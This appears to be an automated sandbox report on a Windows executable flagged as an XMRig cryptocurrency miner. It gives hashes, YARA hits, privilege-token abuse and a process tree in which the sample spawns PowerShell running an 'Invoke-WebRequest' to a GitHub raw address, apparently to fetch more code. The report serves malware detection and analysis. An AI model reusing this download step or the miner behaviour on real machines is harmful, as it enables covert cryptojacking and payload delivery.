Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18-12-2024 02:56
Behavioral task
behavioral1
Sample
008c619d7586369c107df8800349ee07ca5dc3aaa4df7ba19f5cd009743ae5a4.exe
Resource
win7-20240903-en
8 signatures
120 seconds
General
-
Target
008c619d7586369c107df8800349ee07ca5dc3aaa4df7ba19f5cd009743ae5a4.exe
-
Size
2.0MB
-
MD5
407a2f274e0d2ed59f5e93006b9eee86
-
SHA1
89c62e02d795b3122054f8355895370ec4a7357b
-
SHA256
008c619d7586369c107df8800349ee07ca5dc3aaa4df7ba19f5cd009743ae5a4
-
SHA512
3ea4439874eb28dc0cba79dc39a18ac75e821a0789f87c157d2bb1e43ac5f4149d7c90ec29bea440a474c178465e5e41eb92c1618230475a99d757f890f53d10
-
SSDEEP
49152:Lz071uv4BPMkibTIA5sf6r+WVc2HhG82g1Vr5s1PVA:NABQ
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral1/memory/2148-14-0x000000013FD40000-0x0000000140132000-memory.dmp xmrig behavioral1/memory/2148-15-0x000000013FD40000-0x0000000140132000-memory.dmp xmrig behavioral1/memory/2148-16-0x000000013FD40000-0x0000000140132000-memory.dmp xmrig behavioral1/memory/2148-17-0x000000013FD40000-0x0000000140132000-memory.dmp xmrig behavioral1/memory/2148-18-0x000000013FD40000-0x0000000140132000-memory.dmp xmrig behavioral1/memory/2148-19-0x000000013FD40000-0x0000000140132000-memory.dmp xmrig behavioral1/memory/2148-20-0x000000013FD40000-0x0000000140132000-memory.dmp xmrig behavioral1/memory/2148-21-0x000000013FD40000-0x0000000140132000-memory.dmp xmrig behavioral1/memory/2148-22-0x000000013FD40000-0x0000000140132000-memory.dmp xmrig behavioral1/memory/2148-23-0x000000013FD40000-0x0000000140132000-memory.dmp xmrig behavioral1/memory/2148-24-0x000000013FD40000-0x0000000140132000-memory.dmp xmrig behavioral1/memory/2148-25-0x000000013FD40000-0x0000000140132000-memory.dmp xmrig -
pid Process 1376 powershell.exe -
resource yara_rule behavioral1/memory/2148-0-0x000000013FD40000-0x0000000140132000-memory.dmp upx behavioral1/memory/2148-14-0x000000013FD40000-0x0000000140132000-memory.dmp upx behavioral1/memory/2148-15-0x000000013FD40000-0x0000000140132000-memory.dmp upx behavioral1/memory/2148-16-0x000000013FD40000-0x0000000140132000-memory.dmp upx behavioral1/memory/2148-17-0x000000013FD40000-0x0000000140132000-memory.dmp upx behavioral1/memory/2148-18-0x000000013FD40000-0x0000000140132000-memory.dmp upx behavioral1/memory/2148-19-0x000000013FD40000-0x0000000140132000-memory.dmp upx behavioral1/memory/2148-20-0x000000013FD40000-0x0000000140132000-memory.dmp upx behavioral1/memory/2148-21-0x000000013FD40000-0x0000000140132000-memory.dmp upx behavioral1/memory/2148-22-0x000000013FD40000-0x0000000140132000-memory.dmp upx behavioral1/memory/2148-23-0x000000013FD40000-0x0000000140132000-memory.dmp upx behavioral1/memory/2148-24-0x000000013FD40000-0x0000000140132000-memory.dmp upx behavioral1/memory/2148-25-0x000000013FD40000-0x0000000140132000-memory.dmp upx -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1376 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeLockMemoryPrivilege 2148 008c619d7586369c107df8800349ee07ca5dc3aaa4df7ba19f5cd009743ae5a4.exe Token: SeLockMemoryPrivilege 2148 008c619d7586369c107df8800349ee07ca5dc3aaa4df7ba19f5cd009743ae5a4.exe Token: SeDebugPrivilege 1376 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2148 wrote to memory of 1376 2148 008c619d7586369c107df8800349ee07ca5dc3aaa4df7ba19f5cd009743ae5a4.exe 31 PID 2148 wrote to memory of 1376 2148 008c619d7586369c107df8800349ee07ca5dc3aaa4df7ba19f5cd009743ae5a4.exe 31 PID 2148 wrote to memory of 1376 2148 008c619d7586369c107df8800349ee07ca5dc3aaa4df7ba19f5cd009743ae5a4.exe 31
Processes
-
C:\Users\Admin\AppData\Local\Temp\008c619d7586369c107df8800349ee07ca5dc3aaa4df7ba19f5cd009743ae5a4.exe"C:\Users\Admin\AppData\Local\Temp\008c619d7586369c107df8800349ee07ca5dc3aaa4df7ba19f5cd009743ae5a4.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1376
-